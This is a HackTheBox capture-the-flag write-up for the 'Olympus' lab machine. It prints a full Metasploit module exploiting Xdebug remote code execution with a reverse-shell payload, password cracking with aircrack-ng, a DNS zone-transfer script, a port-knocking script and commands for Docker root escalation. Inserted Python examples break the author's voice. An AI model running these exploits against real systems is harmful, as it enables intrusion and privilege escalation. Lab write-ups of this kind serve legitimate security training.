HackTheBox Writeup — Olympus
Hello guys, I am Faisal Husaini and this is my writeup on Medium for the Olympus machine, which has now retired and was also my favourite box on HTB. My username on HTB is "faisalelino".
Olympus is one of the harder boxes on HTB, but the experience of solving it was great as I learned a lot of things along the way.
The IP for this machine is 10.10.10.83, so let's get started.
NMAP Results
First we run an nmap scan with "nmap -sC -sV -oA nmap 10.10.10.83" (default scripts, version detection, output saved in all formats under the name nmap):
# Nmap 7.70 scan initiated Sun Jun 10 02:19:00 2018 as: nmap -sC -sV -oA nmap 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.19s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
53/tcp   open     domain     (unknown banner: Bind)
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    Bind
80/tcp   open     http       Apache httpd
|_http-server-header: Apache
|_http-title: Crete island — Olympus HTB
85/tcp   filtered mit-ml-dev
144/tcp  filtered news
2222/tcp open     ssh        (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
4004/tcp filtered pxc-roid
9040/tcp filtered tor-trans
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D7C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.70%I=7%D=6/10%Time=5B1C3D77%P=x86_64-pc-linux-gnu%r(NU
SF:LL,29,"SSH-2\.0-City\x20of\x20olympia\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\r\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 10 02:20:18 2018 -- 1 IP address (1 host up) scanned in 78.87 seconds
Port 22 (ssh) is filtered, but another ssh service is listening on port 2222 with an odd banner ("City of olympia"), DNS is open on port 53, and port 80 is open, so let's open the IP in a browser.
HTTP Service
Nothing interesting here. Let's look at the source code too.
There is nothing of importance in the page or in its source, so it's time for a dirb scan.
Dirb
dirb doesn't turn up anything useful either, so it's time to run nikto against http://10.10.10.83/
Nikto
Nikto reports an uncommon header, "Xdebug", so let's look it up.
XDebug
Xdebug is the PHP debugging extension, and its official website describes its remote debugging feature (the debugger connects back to the client), so let's see whether there is an exploit for it.
MSF Exploit for XDebug on Exploit-DB by MinatoTW
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Rex::Proto::Http
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'xdebug Unauthenticated OS Command Execution',
      'Description'    => %q{
        Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
        This allows the attacker to execute arbitrary php code as the context of the web user.
      },
      'DisclosureDate' => 'Sep 17 2017',
      'Author'         => [
        'Ricter Zheng',   # Discovery https://twitter.com/RicterZ
        'Taki Tachibana', # MinatoTW
        'Mumbai'          # Austin Hudson
      ],
      'References'     => [
        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
        ['URL', 'https://paper.seebug.org/397/']
      ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => [ARCH_PHP],
      'DefaultTarget'  => 0,
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultOptions' => {
        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
      },
      'Payload'        => {
        'DisableNops' => true,
      },
      'Targets'        => [[ 'Automatic', {} ]],
    ))

    register_options([
      OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
      OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
      OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
      Opt::RPORT(80),
      OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
    ])
  end

  # Starting a debug session and looking for an XDEBUG header in the reply
  # tells us whether xdebug is enabled on the target.
  def check
    begin
      res = send_request_cgi({
        'uri'      => datastore["PATH"],
        'method'   => 'GET',
        'vars_get' => {
          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
        }
      })
      vprint_status "Request sent\n#{res.headers}"
      if res && res.headers.to_s =~ /XDEBUG/i
        vprint_good("Looks like remote server has xdebug enabled\n")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    rescue Rex::ConnectionError
      return CheckCode::Unknown
    end
  end

  def exploit
    # PHP that drops the payload into WriteableDir and runs it, wrapped in the
    # DBGp "eval" command (base64 argument, NUL-terminated).
    payl = Rex::Text.encode_base64("#{payload.encoded}")
    file = "#{datastore['WriteableDir']}" + "/" + rand_text_alphanumeric(5)
    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"

    # Listener for the debugger connect-back (xdebug.remote_connect_back uses X-Forwarded-For).
    webserver = Thread.new do
      begin
        server = Rex::Socket::TcpServer.create(
          'LocalPort' => datastore['SRVPORT'],
          'LocalHost' => datastore['SRVHOST'],
          'Context'   => {
            'Msf'        => framework,
            'MsfExploit' => self
          })
        client = server.accept
        print_status("Waiting for client response.")
        data = client.recv(1024)
        print_status("Receiving response")
        vprint_line(data)
        print_status("Shell might take upto a minute to respond.Please be patient.")
        print_status("Sending payload of size #{cmd1.length} bytes")
        register_file_for_cleanup(file)
        client.write(cmd1)
        client.close
        server.close
        webserver.exit
      ensure
        webserver.exit
      end
    end

    # Trigger the session: the cookie starts xdebug, X-Forwarded-For points it at our listener.
    send_request_cgi({
      'uri'     => datastore['PATH'],
      'method'  => 'GET',
      'headers' => {
        'X-Forwarded-For' => "#{lhost}",
        'Cookie'          => 'XDEBUG_SESSION=' + rand_text_alphanumeric(10)
      }
    })
  end
end
Exploiting Xdebug using msfconsole
We have to set RHOST to 10.10.10.83 and LHOST to our tun0 IP address, then run the exploit command. The module starts a listener on port 9000, requests the page with an X-Forwarded-For header pointing at us, and when Xdebug connects back it sends the DBGp eval command that writes and runs the PHP payload.
Bingo! We got a meterpreter session, so let's move on and look at the contents.
Digging into Meterpreter
Nothing much here; let's look at the contents of the zeus user's home directory.
We see what look like git folders, airgeddon.sh, a folder named captured, etc.
airgeddon.sh is a very long bash script (the wireless auditing tool), so nothing interesting there; now let's dive into the captured folder.
We find a .cap file, which we download using our meterpreter session.
Now let's crack captured.cap using aircrack-ng.
Cracking CAP file using Aircrack-ng
We crack the captured.cap file with aircrack-ng, which runs a dictionary attack against the WPA handshake in the capture.
Command used: aircrack-ng captured.cap -w rockyou.txt, then we wait for the cracking to finish.
We got the key: "flightoficarus".
This was a bit tricky to understand. Then I realised Icarus is a Greek name, which fits the theme of this box, and the nmap results showed ssh open on port 2222, so icarus may be the username. But what about the password?
After asking a friend for a hint, he told me to look at the captured.cap file, so I thought the word "captured" might be the password, but no!
Then I opened captured.cap in Wireshark.
Opening captured.cap file using Wireshark
We see something that reads like a sentence and may be the password: "Too_cl0se_to_th3_Sun". We copy this and connect to ssh.
Connecting to SSH on Port 2222
We connect to ssh with this command:
ssh icarus@10.10.10.83 -p 2222
Bingo, we are in. Let's see what is in the home folder with ls.
We see a text file named help_of_the_gods.txt, and inside it we find a DNS name, so I add it to my /etc/hosts file with the IP 10.10.10.83.
Dig
I tried a lot of things; browsing to ctfolympus.htb showed the same page as browsing to the IP.
After asking a friend for help, he told me to use dig.
So I used dig to request a zone transfer: "dig axfr ctfolympus.htb @10.10.10.83". A zone transfer (AXFR) hands over every record in the zone and should only be allowed to the zone's secondary name servers, but this server answered our request and we get:
In the TXT record we see "St34l_th3_F1re!", which looks similar in style to the icarus password we got from captured.cap.
But what about the username? We see "prometheus" in the same TXT record, but when we tried it on ssh port 2222 it failed to connect.
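The zone transfer dig performs here, done by hand as an added example (not part of the original writeup): it builds the AXFR query, sends it over TCP and parses the answer records, including the name compression and TXT string framing that dig hides. It assumes a server that permits transfers to the requesting host, exactly what happened on this box; the sample answer built by sample_axfr_answer() is constructed for testing and is not the real zone content.

```python
# Added example, not the writeup author's code: the zone transfer "dig axfr" performs,
# done by hand over TCP so the query and the returned records are visible. Assumes an
# authoritative server that permits transfers to the requesting host (unrestricted
# allow-transfer); one that restricts them answers REFUSED (RCODE 5).
# sample_axfr_answer() is constructed for testing and is not the real ctfolympus.htb zone.
import socket
import struct
import sys

RR_TYPES = {1: "A", 2: "NS", 6: "SOA", 15: "MX", 16: "TXT"}

def encode_name(name: str) -> bytes:
    """Wire-format a name: length-prefixed labels ending in a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"

def decode_name(msg: bytes, off: int):
    """Read a possibly compressed name at msg[off]; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                        # pointer to an earlier name
            if not jumped:
                end = off + 2
            off = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels), (end if end is not None else off)

def build_axfr_query(zone: str, txid: int = 0x1337) -> bytes:
    """Header (flags 0, one question) + question for QTYPE 252 (AXFR), QCLASS 1 (IN)."""
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(zone) + struct.pack(">HH", 252, 1)

def build_rr(name: str, rtype: int, rdata: bytes, ttl: int = 300) -> bytes:
    """Wire-format one class-IN resource record."""
    return encode_name(name) + struct.pack(">HHIH", rtype, 1, ttl, len(rdata)) + rdata

def parse_records(msg: bytes) -> list:
    """Return (name, type, value) for each answer record; raise on a non-zero RCODE."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0xF:
        raise ValueError("REFUSED: transfers not allowed from here" if flags & 0xF == 5 else f"RCODE {flags & 0xF}")
    off = 12
    for _ in range(qd):                               # skip the echoed question
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _cls, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        start, off = off + 10, off + 10 + rdlen
        rdata = msg[start:off]
        if rtype == 16:                               # TXT: sequence of <len><chars> strings
            value, i = "", 0
            while i < len(rdata):
                value += rdata[i + 1:i + 1 + rdata[i]].decode()
                i += 1 + rdata[i]
        elif rtype == 1 and rdlen == 4:               # A
            value = ".".join(str(b) for b in rdata)
        elif rtype in (2, 6):                         # NS, SOA: leading name (for SOA, the primary NS)
            value = decode_name(msg, start)[0]
        else:
            value = rdata.hex()
        records.append((name, RR_TYPES.get(rtype, str(rtype)), value))
    return records

def axfr(server: str, zone: str, port: int = 53, timeout: float = 10.0) -> list:
    """AXFR over TCP (2-byte length prefix per message). The transfer may span several
    messages and ends when the SOA record appears for the second time."""
    query = build_axfr_query(zone)
    records, soa_seen = [], 0
    with socket.create_connection((server, port), timeout=timeout) as s, s.makefile("rb") as f:
        s.sendall(struct.pack(">H", len(query)) + query)
        while soa_seen < 2:
            size = struct.unpack(">H", f.read(2))[0]   # struct.error here means the server hung up
            batch = parse_records(f.read(size))
            soa_seen += sum(1 for r in batch if r[1] == "SOA")
            records.extend(batch)
    return records

def sample_axfr_answer() -> bytes:
    """Constructed answer (not the real zone): SOA, TXT and A records; the TXT owner
    name is a compression pointer (0xC00C) back to the question name."""
    zone = "ctfolympus.htb"
    txt = b"\x12constructed sample\x07 record"       # two TXT strings, 18 and 7 bytes
    header = struct.pack(">HHHHHH", 0x1337, 0x8400, 1, 3, 0, 0)   # QR|AA, 1 question, 3 answers
    question = encode_name(zone) + struct.pack(">HH", 252, 1)
    soa = encode_name("ns1." + zone) + encode_name("hostmaster." + zone) + struct.pack(">IIIII", 1, 3600, 600, 86400, 300)
    return (header + question + build_rr(zone, 6, soa)
            + b"\xc0\x0c" + struct.pack(">HHIH", 16, 1, 300, len(txt)) + txt
            + build_rr("www." + zone, 1, bytes([10, 10, 10, 83])))

if __name__ == "__main__":
    # python3 axfr.py 10.10.10.83 ctfolympus.htb
    for name, rtype, value in axfr(sys.argv[1], sys.argv[2]):
        print(f"{name:30} {rtype:5} {value}")
```

A server with a restricted allow-transfer list answers with RCODE 5 (REFUSED), which parse_records turns into an exception; that, rather than a timeout, is what you should see from a correctly configured authoritative server.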
Port 22 was filtered too. At that point I didn't know about port knocking; my friend helped by telling me to watch IppSec's Nineveh video.
From that I learned about port knocking, and now we come to that part.
Port Knocking
I created a simple bash one-liner for the port knocking.
In IppSec's Nineveh video he took the 3 ports from a port-knocking configuration file on the box, which we don't have here.
So what to do?
Remember the TXT record we got from dig: it said "portal to Hades" followed by 3 numbers.
These are the 3 ports to knock, in order: 3456, 8234, 62431.
So I used this command to send the knocks and then connect directly to ssh on port 22:
for i in 3456 8234 62431; do nmap -Pn -p $i --host-timeout 201 --max-retries 0 10.10.10.83; done; ssh prometheus@10.10.10.83
Each nmap run sends a single probe to one port; the knock daemon opens port 22 only after it sees the sequence in that order, so the ssh connection has to follow right after the knocks. Now ssh connects without port 22 being filtered, and we enter the password "St34l_th3_F1re!".
And we are in. Now let's get the user flag.
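The same knock sequence in Python, as an added example (not part of the original writeup), with the connection step injectable so the order of the knocks can be checked without a target. It assumes a knockd-style daemon on the host that opens tcp/22 to the knocking address after seeing SYNs to 3456, 8234 and 62431 in that order; how long it tolerates between knocks and how long port 22 stays open are the daemon's settings, which we cannot see from outside.

```python
# Added example, not the writeup author's code: the knock sequence in Python, with the
# connection step injectable so the order can be checked without a target. Assumes a
# knockd-style daemon on the host that opens tcp/22 for the knocking address after it
# sees SYNs to 3456, 8234 and 62431 in that order (the numbers from the TXT record);
# how long it waits between knocks and how long 22 stays open are the daemon's settings.
import socket
import sys
import time

KNOCK_PORTS = (3456, 8234, 62431)

def tcp_knock(host: str, port: int, timeout: float = 0.5) -> None:
    """One knock: a connect attempt. The knock ports are closed or filtered, so this is
    refused or times out; only the SYN reaching the host matters."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            pass
    except OSError:
        pass

def knock(host: str, ports=KNOCK_PORTS, delay: float = 0.2, send=tcp_knock) -> list:
    """Knock each port in order with a short pause so the daemon sees them as a sequence.
    Returns the (host, port) pairs in the order they were sent."""
    sent = []
    for port in ports:
        send(host, port)
        sent.append((host, port))
        time.sleep(delay)
    return sent

def ssh_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Read the SSH identification line; empty string if the port is still filtered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(256).decode(errors="replace").strip()
    except OSError:
        return ""

def open_ssh(host: str) -> str:
    """Knock, then check that port 22 now answers; the ssh login itself follows."""
    knock(host)
    return ssh_banner(host)

if __name__ == "__main__":
    # python3 knock.py 10.10.10.83 && ssh prometheus@10.10.10.83
    banner = open_ssh(sys.argv[1])
    print(banner or "port 22 still filtered: check the knock order and timing")
    sys.exit(0 if banner else 1)
```

If the banner check fails, the usual causes are the knocks arriving out of order (a parallel scanner will not work), a gap between knocks longer than the daemon allows, or the daemon having already closed port 22 again before ssh connected.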
User Flag
The user flag was in the home directory, so ls and then cat user.txt gives us the flag.
Bingo, now time for root.
Privilege Escalation
Let's transfer LinEnum.sh from my local machine, run it and look at the results.
We are not able to run sudo as prometheus, but once the script finished we saw one interesting thing:
The user can use Docker, which hints at a Docker privilege escalation. Searching Google for docker privilege escalation gave me these commands:
docker run [tab tab] to list the available images
docker run -t -i olympia /bin/bash
docker run -v /root:/root -i -t olympia /bin/bash
The third one bind-mounts the host's /root directory into the container, and since we are root inside the container we can read the host's files there. Anyone who can talk to the Docker daemon can mount any host path this way, which is why Docker access is effectively root on the host.
So I ran the last command and got a root shell in the container with the host's /root mounted, and the root flag is at /root/root.txt.
Root Flag
This machine was really awesome and I gained a lot of knowledge from it, like port knocking, Docker privilege escalation, etc.
Vulnerabilities used to solve this box:
- Xdebug exploitation
- Zone transfers
- Port knocking
- Docker privilege escalation
References
Xdebug exploit by MinatoTW on HTB → https://www.exploit-db.com/exploits/44568/
IppSec's Nineveh video for port knocking → https://www.youtube.com/watch?v=K9DKULxSBK4
Docker privilege escalation → https://fosterelli.co/privilege-escalation-via-docker.html